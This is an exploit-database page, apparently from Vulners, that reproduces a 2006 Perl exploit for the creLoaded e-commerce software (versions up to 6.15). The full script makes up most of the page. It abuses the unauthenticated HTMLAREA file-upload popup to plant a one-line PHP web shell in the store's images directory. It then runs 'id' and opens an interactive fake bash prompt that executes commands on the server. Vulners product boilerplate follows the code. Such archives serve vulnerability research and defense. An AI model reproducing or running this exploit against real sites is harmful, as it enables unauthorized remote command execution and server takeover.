Vulners
Lucene search
creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit
#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <[email protected]>
#
# Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# * User-defined PHP script or one provided in this script (suits most occasions)
# * Additional variables to pass to PHP script after upload
# * HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#
print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;
my $baseurl = "/admin/htmlarea/popups/file/files.php";
my $status = getopts('s:p:a:');
if(@ARGV < 1) { die(usage()); }
my %vars, $response, $masterurl, $browser, $cmd;
$masterurl = @ARGV[0];
$browser = LWP::UserAgent->new;
if($opt_s) {
print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}
if($opt_p) {
$browser->proxy(['http', 'https'] => $opt_p);
print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}
if($opt_a) {
@tmp = split(",",$opt_a);
foreach $tmpvar (@tmp) {
@tmp2 = split("=",$tmpvar);
$vars{$tmp2[0]} = $tmp2[1];
print "[+] Adding variable '" . $tmp2[0] . "' with value '" . $tmp2[1] . "'\n";
}
}
sub usage
{
print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] URL\n\n";
print "-a - additional variables i.e. -aaction=create,cid=12\n";
print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
print "-s - specify path to user-defined script instead of using default\n";
print "URL - http://vuln/store\n\n";
exit;
}
sub sendform
{
if($opt_G) {
my $url = $masterurl . "?";
# Non-issue, but could beautify the single line here at a later date.
foreach $tmp (keys (%vars)) {
$url .= "\&$tmp=" . $vars{$tmp};
}
$response = $browser->get($url);
die "Failed to get!" unless defined $response;
} else {
$response = $browser->post($masterurl, \%vars);
die "Failed to post!" unless defined $response;
}
}
if(!$opt_s) {
# Lazy.
print "[*] Creating 'default' PHP script\n";
$tmp = "<?php system(\$a); ?>";
open(FILE, "> /tmp/default.php");
print FILE $tmp;
close(FILE);
$opt_s = "/tmp/default.php";
}
open(FILE, "< $opt_s");
@content = <FILE>;
close(FILE);
if(!$vars{"dirPath"}) {
print "[*] Setting upload path to $masterurl/images\n";
$vars{"dirPath"} = "/../images/";
}
$tmp = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$browser->timeout(10);
$req = POST $tmp, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
$browser->timeout(180);
$term = Term::ReadLine->new('cre');
print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/default.php";
$vars{"a"} = "id";
&sendform;
print $response->content;
while(1) {
$prompt = "bash-2.05b\$ ";
$tmp = $term->readline($prompt, "");
$cmd = $tmp;
if(($cmd eq "quit") || ($cmd eq "exit")) {
exit;
}
$vars{"a"} = $cmd;
&sendform;
print $response->content;
}
# milw0rm.com [2006-01-24]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2006 00:00Current
7.1High risk
Vulners AI Score7.1